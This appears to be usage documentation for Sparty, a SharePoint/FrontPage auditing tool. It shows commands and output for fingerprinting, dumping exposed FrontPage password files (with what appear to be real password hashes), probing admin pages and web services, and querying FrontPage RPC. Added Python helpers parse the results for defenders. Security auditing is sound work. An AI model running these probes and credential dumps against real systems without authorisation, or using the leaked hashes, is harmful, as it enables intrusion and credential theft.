[*] Sparty - Usage Parameters and Help !

Note: All the examples presented in this documentation were tested against live websites (vulnerable and misconfigured). The URLs have been masked: http://target-front.com stands in for the FrontPage target and http://target-share.com for the SharePoint target.

# python sparty_beta_v_0.1.py -h
	---------------------------------------------------------------
                                                                 
          _|_|_|    _|_|_|     _|_|    _|_|_|    _|_|_|_|_|  _|      _|  
         _|        _|    _|  _|    _|  _|    _|      _|        _|  _|    
           _|_|    _|_|_|    _|_|_|_|  _|_|_|        _|          _|      
               _|  _|        _|    _|  _|    _|      _|          _|      
         _|_|_|    _|        _|    _|  _|    _|      _|          _|      

        SPARTY : Sharepoint/Frontpage Security Auditing Tool!
        Authored by: Aditya K Sood |{0kn0ck}@secniche.org  | 2013
        Twitter:     @AdityaKSood
        Powered by: IOActive Labs !
        
	--------------------------------------------------------------
Usage: sparty_beta_v_0.1.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Frontpage::
    -f FRONTPAGE, --frontpage=FRONTPAGE
                        <FRONTPAGE = pvt | bin> -- to check access permissions
                        on frontpage standard files in vti or bin directory!

  Sharepoint::
    -s SHAREPOINT, --sharepoint=SHAREPOINT
                        <SHAREPOINT = forms | layouts | catalog> -- to check
                        access permissions on sharepoint standard files in
                        forms or layouts or catalog directory!

  Mandatory::
    -u URL, --url=URL   target url to scan with proper structure

  Information Gathering and Exploit::
    -v FINGERPRINT, --http_fingerprint=FINGERPRINT
                        <FINGERPRINT = ms_sharepoint | ms_frontpage> --
                        fingerprint sharepoint or frontpage based on HTTP
                        headers!
    -d DUMP, --dump=DUMP
                        <DUMP = dump | extract> -- dump credentials from
                        default sharepoint and frontpage files (configuration
                        errors and exposed entries)!
    -l DIRECTORY, --list=DIRECTORY
                        <DIRECTORY = list | index> -- check directory listing
                        and permissions!
    -e EXPLOIT, --exploit=EXPLOIT
                        EXPLOIT = <rpc_version_check | rpc_service_listing |
                        rpc_file_upload | author_config_check |
                        author_remove_folder> -- exploit vulnerable
                        installations by checking RPC querying, service
                        listing and file uploading
    -i SERVICES, --services=SERVICES
                        SERVICES = <serv | services> -- checking exposed
                        services !

  General::
    -x EXAMPLES, --examples=EXAMPLES
                        running usage examples !

[*] Sharepoint/ Frontpage Version Fingerprinting !

# python sparty.py -v ms_frontpage -u http://www.target-front.com 

[+] extracting frontpage version from default file : (['"4.0.2.2717"']):

[+] frontpage fingerprinting module completed !

# python sparty.py -v ms_sharepoint -u https://www.target-share.com

[+] configured sharepoint version is  : (12.0.0.6211)
[-] sharepoint load balancing ability could not be determined using HTTP header : X-SharepointHealthScore !
[-] sharepoint diagnostics ability could not be determined using HTTP header : SPRequestGuid !

[+] sharepoint fingerprinting module completed !
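The two fingerprinting runs above read a version string out of a FrontPage default file and out of SharePoint response headers. The following is an added example written for this page, not Sparty's own code, that shows the parsing side of that on constructed sample data so it runs offline. It assumes the FrontPage version comes from the FPVersion="..." entry of _vti_inf.html (the output above only says "default file") and that the SharePoint version comes from the MicrosoftSharePointTeamServices response header (the output above does not name the header). The disclosing_headers() helper is the check an administrator runs after suppressing those headers to confirm nothing version-bearing is still sent.

```python
"""Fingerprint checks for FrontPage and SharePoint responses.

Added example, not part of Sparty. Runs on constructed sample data.
Assumptions: the FrontPage version is read from the FPVersion="..." entry of
_vti_inf.html, and the SharePoint version from the
MicrosoftSharePointTeamServices response header.
"""
import re

# Constructed sample: a FrontPage _vti_inf.html body (assumed layout).
SAMPLE_VTI_INF = """<html><head><title>FrontPage Configuration Information</title>
<!-- FrontPage Configuration Information
     FPVersion="4.0.2.2717"
     FPShtmlScriptUrl="_vti_bin/shtml.exe/_vti_rpc"
-->
</head></html>
"""

# Constructed sample: headers of a SharePoint 2007-era site, which (as in the
# run above) sends neither the health score nor the request GUID header.
SAMPLE_SP_HEADERS_OLD = {
    "Server": "Microsoft-IIS/6.0",
    "X-Powered-By": "ASP.NET",
    "MicrosoftSharePointTeamServices": "12.0.0.6211",
}

# Constructed sample: a newer farm that emits both optional headers.
SAMPLE_SP_HEADERS_NEW = {
    "Server": "Microsoft-IIS/7.5",
    "MicrosoftSharePointTeamServices": "14.0.0.4762",
    "X-SharePointHealthScore": "0",
    "SPRequestGuid": "0d7e9b1c-2e3f-4a5b-8c6d-7e8f9a0b1c2d",
}

FP_VERSION_RE = re.compile(r'FPVersion="([0-9.]+)"')

# Headers that disclose the platform or its version; a hardened site strips
# these at the reverse proxy or in IIS. Names are compared lower-cased.
DISCLOSING_HEADERS = (
    "server",
    "x-powered-by",
    "x-aspnet-version",
    "microsoftsharepointteamservices",
)


def frontpage_version(vti_inf_body):
    """Return the FPVersion string from an _vti_inf.html body, or None."""
    match = FP_VERSION_RE.search(vti_inf_body)
    return match.group(1) if match else None


def sharepoint_fingerprint(headers):
    """Summarise SharePoint-related response headers.

    headers: mapping of header name -> value. Names are matched
    case-insensitively because HTTP header names are case-insensitive.
    """
    lowered = {name.lower(): value for name, value in headers.items()}
    return {
        "version": lowered.get("microsoftsharepointteamservices"),
        # The two headers Sparty reports on; absent on older releases.
        "load_balancing_header": "x-sharepointhealthscore" in lowered,
        "diagnostics_header": "sprequestguid" in lowered,
    }


def disclosing_headers(headers):
    """Names of headers (as sent) that reveal the platform or its version."""
    return [name for name in headers if name.lower() in DISCLOSING_HEADERS]


if __name__ == "__main__":
    print("frontpage version:", frontpage_version(SAMPLE_VTI_INF))
    for sample in (SAMPLE_SP_HEADERS_OLD, SAMPLE_SP_HEADERS_NEW):
        print(sharepoint_fingerprint(sample), disclosing_headers(sample))
```

Run against a real response by passing the header mapping your HTTP client returns; an empty list from disclosing_headers() is the state to aim for on an internet-facing site.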

[*] Dumping Passwords from Exposed Files !

# python sparty.py -d dump -u http://www.target-front.com 

[+]------------------------------------------------------------------------------------------------!
[+] dumping (service.pwd | authors.pwd | administrators.pwd | ws_ftp.log) files if possible!
[+]--------------------------------------------------------------------------------------------------!

[+] dumping contents of file located at : (http://www.target-front.com/_vti_pvt/service.pwd)

[+] dumping contents of file located at : (http://www.target-front.com/_vti_pvt/administrators.pwd)

[+] dumping contents of file located at : (http://www.target-front.com/_vti_pvt/authors.pwd)

[+] check the (__dump__.txt) file if generated !


[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden !

[+] (password dumping) - module executed successfully !

# cat __dump__.txt 
# -FrontPage-
target-front:Tagzan9yidZnI

# -FrontPage-
target-front:c/qfc.CTmiCAY

# -FrontPage-
target-front:c/qfc.CTmiCAY

[*] Indexing Check for Critical Directories !

# python sparty.py -l list -u http://www.target-front.com 

[+]-----------------------------------------------------------------------!
[+] auditing frontpage directory permissions (forbidden | index | not exist)!
[+]-------------------------------------------------------------------------!

[+] (http://www.target-front.com/_vti_pvt/) - (200)
[+] (http://www.target-front.com/_vti_bin/) - (200)
[+] (http://www.target-front.com/_vti_log/) - (200)
[+] (http://www.target-front.com/_vti_cnf/) - (200)
[-] (http://www.target-front.com/_vti_bot) - (404)
[+] (http://www.target-front.com/_vti_bin/_vti_adm) - (200)
[+] (http://www.target-front.com/_vti_bin/_vti_aut) - (200)
[+] (http://www.target-front.com/_vti_txt/) - (200)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden !

[+] (directory check) - module executed successfully !

[*] Scanning Access Rights on Frontpage Files (_vti_pvt and _vti_bin directories) !

# python sparty_beta_v_0.1.py -f pvt -u http://www.target-front.com
        
	--------------------------------------------------------------
[+] fetching information from the given target : (http://www.target-front.com)
[+] target responded with HTTP code: (200)
[+] target is running server: (YTS/1.20.28)

[+]---------------------------------------------------------!
[+] auditing '/_vti_pvt/' directory for sensitive information !
[+]-----------------------------------------------------------!

[+] (http://www.target-front.com/_vti_pvt/authors.pwd) - (200)
[+] (http://www.target-front.com/_vti_pvt/administrators.pwd) - (200)
[+] (http://www.target-front.com/_vti_pvt/users.pwd) - (200)
[+] (http://www.target-front.com/_vti_pvt/service.pwd) - (200)
[+] (http://www.target-front.com/_vti_pvt/service.grp) - (200)
[+] (http://www.target-front.com/_vti_pvt/bots.cnf) - (200)
[+] (http://www.target-front.com/_vti_pvt/service.cnf) - (200)
[+] (http://www.target-front.com/_vti_pvt/access.cnf) - (200)
[+] (http://www.target-front.com/_vti_pvt/writeto.cnf) - (200)
[-] (http://www.target-front.com/_vti_pvt/botsinf.cnf) - (404)
[+] (http://www.target-front.com/_vti_pvt/doctodep.btr) - (200)
[+] (http://www.target-front.com/_vti_pvt/deptodoc.btr) - (200)
[+] (http://www.target-front.com/_vti_pvt/linkinfo.cnf) - (200)
[-] (http://www.target-front.com/_vti_pvt/services.org) - (404)
[-] (http://www.target-front.com/_vti_pvt/structure.cnf) - (404)
[+] (http://www.target-front.com/_vti_pvt/svcacl.cnf) - (200)
[-] (http://www.target-front.com/_vti_pvt/uniqperm.cnf) - (404)
[-] (http://www.target-front.com/_vti_pvt/service/lck) - (404)
[+] (http://www.target-front.com/_vti_pvt/frontpg.lck) - (200)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (pvt file access) - module executed successfully !

[*] Scanning Access Rights on Sharepoint Files (forms, layouts and catalogs directories) !

# python sparty.py -s layouts -u http://www.target-share.com

[+]-----------------------------------------------------------------!
[+] auditing sharepoint '/_layouts/' directory for access permissions !
[+]-------------------------------------------------------------------!

[+] (http://www.target-share.com/_layouts/aclinv.aspx) - (200)
[+] (http://www.target-share.com/_layouts/addrole.aspx) - (200)
[+] (http://www.target-share.com/_layouts/AdminRecycleBin.aspx) - (200)
[+] (http://www.target-share.com/_layouts/AreaNavigationSettings.aspx) - (200)
[+] (http://www.target-share.com/_Layouts/AreaTemplateSettings.aspx) - (200)
[+] (http://www.target-share.com/_Layouts/AreaWelcomePage.aspx) - (200)
[+] (http://www.target-share.com/_layouts/associatedgroups.aspx) - (200)
[+] (http://www.target-share.com/_layouts/bpcf.aspx) - (200)
[+] (http://www.target-share.com/_Layouts/ChangeSiteMasterPage.aspx) - (200)
[+] (http://www.target-share.com/_layouts/create.aspx) - (200)
[+] (http://www.target-share.com/_layouts/editgrp.aspx) - (200)
[+] (http://www.target-share.com/_layouts/editprms.aspx) - (200)
[+] (http://www.target-share.com/_layouts/groups.aspx) - (200)
[+] (http://www.target-share.com/_layouts/help.aspx) - (200)
[-] (http://www.target-share.com/_layouts/images/) - (403)
[+] (http://www.target-share.com/_layouts/listedit.aspx) - (200)
[+] (http://www.target-share.com/_layouts/ManageFeatures.aspx) - (200)
[+] (http://www.target-share.com/_layouts/ManageFeatures.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mcontent.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mngctype.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mngfield.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mngsiteadmin.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mngsubwebs.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mngsubwebs.aspx?view=sites) - (200)
[+] (http://www.target-share.com/_layouts/mobile/mbllists.aspx) - (200)
[+] (http://www.target-share.com/_layouts/MyInfo.aspx) - (200)
[+] (http://www.target-share.com/_layouts/MyPage.aspx) - (200)
[+] (http://www.target-share.com/_layouts/MyTasks.aspx) - (200)
[+] (http://www.target-share.com/_layouts/navoptions.aspx) - (200)
[+] (http://www.target-share.com/_layouts/NewDwp.aspx) - (200)
[+] (http://www.target-share.com/_layouts/newgrp.aspx) - (200)
[+] (http://www.target-share.com/_layouts/newsbweb.aspx) - (200)
[+] (http://www.target-share.com/_layouts/PageSettings.aspx) - (200)
[+] (http://www.target-share.com/_layouts/people.aspx) - (200)
[+] (http://www.target-share.com/_layouts/people.aspx?MembershipGroupId=0) - (200)
[+] (http://www.target-share.com/_layouts/permsetup.aspx) - (200)
[+] (http://www.target-share.com/_layouts/picker.aspx) - (200)
[+] (http://www.target-share.com/_layouts/policy.aspx) - (200)
[+] (http://www.target-share.com/_layouts/policyconfig.aspx) - (200)
[+] (http://www.target-share.com/_layouts/policycts.aspx) - (200)
[+] (http://www.target-share.com/_layouts/Policylist.aspx) - (200)
[+] (http://www.target-share.com/_layouts/prjsetng.aspx) - (200)
[+] (http://www.target-share.com/_layouts/quiklnch.aspx) - (200)
[+] (http://www.target-share.com/_layouts/recyclebin.aspx) - (200)
[+] (http://www.target-share.com/_Layouts/RedirectPage.aspx) - (200)
[+] (http://www.target-share.com/_layouts/role.aspx) - (200)
[+] (http://www.target-share.com/_layouts/settings.aspx) - (200)
[+] (http://www.target-share.com/_layouts/SiteDirectorySettings.aspx) - (200)
[+] (http://www.target-share.com/_layouts/sitemanager.aspx) - (200)
[+] (http://www.target-share.com/_layouts/SiteManager.aspx?lro=all) - (200)
[+] (http://www.target-share.com/_layouts/spcf.aspx) - (200)
[+] (http://www.target-share.com/_layouts/storman.aspx) - (200)
[+] (http://www.target-share.com/_layouts/themeweb.aspx) - (200)
[+] (http://www.target-share.com/_layouts/topnav.aspx) - (200)
[+] (http://www.target-share.com/_layouts/user.aspx) - (200)
[+] (http://www.target-share.com/_layouts/userdisp.aspx) - (200)
[+] (http://www.target-share.com/_layouts/userdisp.aspx?ID=1) - (200)
[+] (http://www.target-share.com/_layouts/useredit.aspx) - (200)
[+] (http://www.target-share.com/_layouts/useredit.aspx?ID=1) - (200)
[+] (http://www.target-share.com/_layouts/viewgrouppermissions.aspx) - (200)
[+] (http://www.target-share.com/_layouts/viewlsts.aspx) - (200)
[+] (http://www.target-share.com/_layouts/vsubwebs.aspx) - (200)
[+] (http://www.target-share.com/_layouts/WPPrevw.aspx?ID=247) - (200)
[+] (http://www.target-share.com/_layouts/wrkmng.aspx) - (200)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden !

[+] (layout file access) - module executed successfully !

[*] Exposed Services Check !

# python sparty.py -i services -u https://www.target-share.com


[+]------------------------------------------------------!
[+] checking exposed services in the frontpage/sharepoint  directory!
[+]------------------------------------------------------!

[-] (https://www.target-share.com/_vti_bin/Admin.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/alerts.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/dspsts.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/forms.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/Lists.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/people.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/Permissions.asmx) - (200)
[-] (https://www.target-share.com/_vti_bin/search.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/UserGroup.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/versions.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/Views.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/webpartpages.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/webs.asmx) - (200)
[-] (https://www.target-share.com/_vti_bin/spsdisco.aspx) - (404)
[-] (https://www.target-share.com/_vti_bin/AreaService.asmx) - (404)
[-] (https://www.target-share.com/_vti_bin/BusinessDataCatalog.asmx) - (404)
[-] (https://www.target-share.com/_vti_bin/ExcelService.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/SharepointEmailWS.asmx) - (200)
[-] (https://www.target-share.com/_vti_bin/spscrawl.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/spsearch.asmx) - (200)
[-] (https://www.target-share.com/_vti_bin/UserProfileService.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/WebPartPages.asmx) - (200)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden !

[+] (exposed services check) - module executed successfully !
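The directory, file-access and services modules above all print one "[+] (url) - (code)" line per probe and leave the reader to pick out the 200s. The following is an added example, written for this page rather than taken from Sparty, that parses that line format, groups URLs by the meaning the documentation assigns to each code, and collapses entries that differ only in letter case (the layouts and services runs above list ManageFeatures.aspx twice and both webpartpages.asmx and WebPartPages.asmx, which IIS serves as the same file). The sample lines are constructed in Sparty's format.

```python
"""Triage helper for Sparty's per-URL result lines.

Added example, not part of Sparty. Parses "[+] (url) - (code)" lines, groups
them by the documented meaning of each HTTP code, and de-duplicates paths
that differ only in case. SAMPLE_OUTPUT is constructed in Sparty's format.
"""
import re
from collections import OrderedDict
from urllib.parse import urlsplit

# Constructed sample in Sparty's output format (last line is a footer, not a result).
SAMPLE_OUTPUT = """\
[+] (https://www.target-share.com/_vti_bin/Lists.asmx) - (200)
[-] (https://www.target-share.com/_vti_bin/search.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/webpartpages.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/WebPartPages.asmx) - (200)
[-] (https://www.target-share.com/_layouts/images/) - (403)
[+] (https://www.target-share.com/_layouts/ManageFeatures.aspx) - (200)
[+] (https://www.target-share.com/_layouts/ManageFeatures.aspx) - (200)
[-] (https://www.target-share.com/_vti_pvt/service.pwd) - (500)
[+] check for HTTP codes (200) for active list of accessible files or directories!
"""

RESULT_RE = re.compile(r"^\[[+-]\] \((?P<url>\S+)\) - \((?P<code>\d{3})\)\s*$")

# The meaning the documentation gives each code.
CODE_MEANING = {200: "accessible", 403: "forbidden", 404: "not exists", 500: "server error"}


def parse_results(text):
    """Return (url, code) pairs for every result line; other lines are skipped."""
    results = []
    for line in text.splitlines():
        match = RESULT_RE.match(line)
        if match:
            results.append((match.group("url"), int(match.group("code"))))
    return results


def dedupe_case_insensitive(results):
    """Keep the first result per case-folded host, path and query."""
    seen = OrderedDict()
    for url, code in results:
        parts = urlsplit(url)
        key = (parts.scheme, parts.netloc.lower(), parts.path.lower(), parts.query.lower())
        if key not in seen:
            seen[key] = (url, code)
    return list(seen.values())


def group_by_meaning(results):
    """Map each code meaning to the URLs that returned it, in input order."""
    groups = {}
    for url, code in results:
        meaning = CODE_MEANING.get(code, "http %d" % code)
        groups.setdefault(meaning, []).append(url)
    return groups


def accessible(results):
    """URLs that answered 200: the 'active list' the documentation points at."""
    return [url for url, code in results if code == 200]


if __name__ == "__main__":
    findings = dedupe_case_insensitive(parse_results(SAMPLE_OUTPUT))
    for meaning, urls in group_by_meaning(findings).items():
        print("%-12s %d" % (meaning, len(urls)))
    print("review first:", accessible(findings))
```

Feed it the saved console output of a run; the "accessible" group is what to compare against the access rules you intended, and a non-empty "server error" group is worth a look too, since a 500 on a probe can mean the handler exists but failed rather than that the path is absent.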

[*] Frontpage RPC Querying !

# python sparty.py -e rpc_version_check -u https://www.target-front.com

[+]-----------------------------------------------------------------------!
[+] auditing frontpage RPC service                                          !
[+]-------------------------------------------------------------------------!

[+] Sending HTTP GET request to - (https://www.target-front.com/_vti_bin/shtml.exe/_vti_rpc) for verifying whether RPC is listening !
[+] target is listening on frontpage RPC - (200) !

[+] Sending HTTP POST request to retrieve software version - (https://www.target-front.com/_vti_bin/shtml.exe/_vti_rpc)
[+] target accepts the request - (method= server version) | (200) !

<html><head><title>vermeer RPC packet</title></head>

<body>

<p>method= server version:5.0.2.2634

<p>status=

<ul>

<li>status=917506

<li>osstatus=0

<li>msg=The method ' server version' is not recognized.

<li>osmsg=

</ul>

</body>

</html>

[*] ---------------------------------------------------------------------------------------
[+] Sending HTTP GET request to - (https://www.target-front.com/_vti_bin/shtml.dll/_vti_rpc) for verifying whether RPC is listening !
[-] server responds with bad status !
[+] Sending HTTP POST request to retrieve software version - (https://www.target-front.com/_vti_bin/shtml.dll/_vti_rpc)
[-] server responds with bad status !
[*] ---------------------------------------------------------------------------------------

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden !

[+] (module RPC check) - module executed successfully !

[*] Frontpage - Service Listing !

# python sparty_beta_v_0.1.py -e rpc_service_listing -u http://www.target-front.com
        
	--------------------------------------------------------------
[+] fetching information from the given target : (http://www.target-front.com)
[+] target responded with HTTP code: (200)
[+] target is running server: (Apache/2.2.3 (Red Hat))

[+]-----------------------------------------------------------------------!
[+] auditing frontpage RPC service for fetching listing                     !
[+]-------------------------------------------------------------------------!

[+] Sending HTTP POST request to retrieve service listing  - (http://www.target-front.com/_vti_bin/shtml.exe/_vti_rpc)
[+] target accepts the request - (method=list+services:3.0.2.1076&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:3.0.2.1076&service_name=.html) 

[+] target accepts the request - (method=list+services:4.0.2.471&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.471&service_name=.html) 

[+] target accepts the request - (method=list+services:4.0.2.0000&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.0000&service_name=.html) 

[+] target accepts the request - (method=list+services:5.0.2.4803&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.4803&service_name=.html) 

[+] target accepts the request - (method=list+services:5.0.2.2623&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.2623&service_name=.html) 

[+] target accepts the request - (method=list+services:6.0.2.5420&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:6.0.2.5420&service_name=.html) 

[*] ---------------------------------------------------------------------------------------
[+] Sending HTTP POST request to retrieve service listing  - (http://www.target-front.com/_vti_bin/shtml.dll/_vti_rpc)
[-] server responds with bad status !
[*] ---------------------------------------------------------------------------------------

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (module RPC service listing check) - module executed successfully !


# cat __service-list__.txtmethod\=list+services\:3.0.2.1076\&service_name\=.html 
<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method=list services:3.0.2.1076
<p>services_list=
<ul>
<ul>
<li>service_name=
<li>meta_info=
<ul>
<li>vti_restartmanual
<li>IX|0
<li>vti_featurelist

--- Truncated HTML Output ! ---
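Both RPC modules above get back a "vermeer RPC packet" HTML body whose content is a flat series of <p>key=value and <li>key=value entries. The following is an added example, written for this page and not part of Sparty, that parses those entries out of the two responses shown above (embedded here as sample input) and summarises them. It keeps leading whitespace in values on purpose: in the version-check reply the echoed method name is " server version" with a leading space, and that exact string is what the msg entry says is not recognized, so a parser that strips values would hide why the call failed. Note that a reply carrying such an error still confirms the _vti_rpc endpoint is live and answering in the FrontPage RPC format, which is the exposure an administrator needs to act on.

```python
"""Parser for FrontPage "vermeer RPC packet" responses.

Added example, not part of Sparty. The two sample bodies are the responses
shown in this documentation. Values keep their leading whitespace so the
space in ' server version' that the server rejects stays visible.
"""
import re

# Response to the version-check POST, as shown in the RPC querying run.
SAMPLE_VERSION_CHECK = """<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method= server version:5.0.2.2634
<p>status=
<ul>
<li>status=917506
<li>osstatus=0
<li>msg=The method ' server version' is not recognized.
<li>osmsg=
</ul>
</body>
</html>
"""

# Start of the service-listing response, as shown (and truncated) above.
SAMPLE_SERVICE_LIST = """<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method=list services:3.0.2.1076
<p>services_list=
<ul>
<ul>
<li>service_name=
<li>meta_info=
<ul>
<li>vti_restartmanual
<li>IX|0
<li>vti_featurelist
"""

VERMEER_TITLE = "<title>vermeer rpc packet</title>"
# One <p>key=value or <li>key=value entry per line; the value is kept as-is.
ENTRY_RE = re.compile(r"^<(?:p|li)>([A-Za-z_]+)=(.*?)\r?$", re.MULTILINE)


def is_vermeer_packet(body):
    """True when the body carries the title FrontPage RPC uses for its replies."""
    return VERMEER_TITLE in body.lower()


def parse_entries(body):
    """Ordered (key, value) pairs; keys may repeat (status appears as <p> and <li>)."""
    return [(m.group(1), m.group(2)) for m in ENTRY_RE.finditer(body)]


def first_value(entries, key):
    """First non-empty value for key, or None when every occurrence is empty."""
    for k, v in entries:
        if k == key and v != "":
            return v
    return None


def summarize(body):
    """Describe a reply: whether it is RPC at all, the echoed method, any error."""
    if not is_vermeer_packet(body):
        return {"vermeer": False}
    entries = parse_entries(body)
    method = first_value(entries, "method")
    status = first_value(entries, "status")
    name, _, version = method.partition(":") if method else (None, "", "")
    return {
        "vermeer": True,
        "method": method,
        "method_name": name,          # text before the colon, whitespace intact
        "method_version": version or None,
        # A numeric <li>status= entry accompanies an error; absent otherwise.
        "error_status": int(status) if status and status.isdigit() else None,
        "msg": first_value(entries, "msg"),
        "keys": [k for k, _ in entries],
    }


if __name__ == "__main__":
    for body in (SAMPLE_VERSION_CHECK, SAMPLE_SERVICE_LIST):
        print(summarize(body))
```

On the version-check sample the summary reports error_status 917506 with the "not recognized" message and a method_name that starts with a space; on the listing sample there is no status entry, and the presence of the services_list key is the useful signal.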

(C) Aditya K Sood , 2013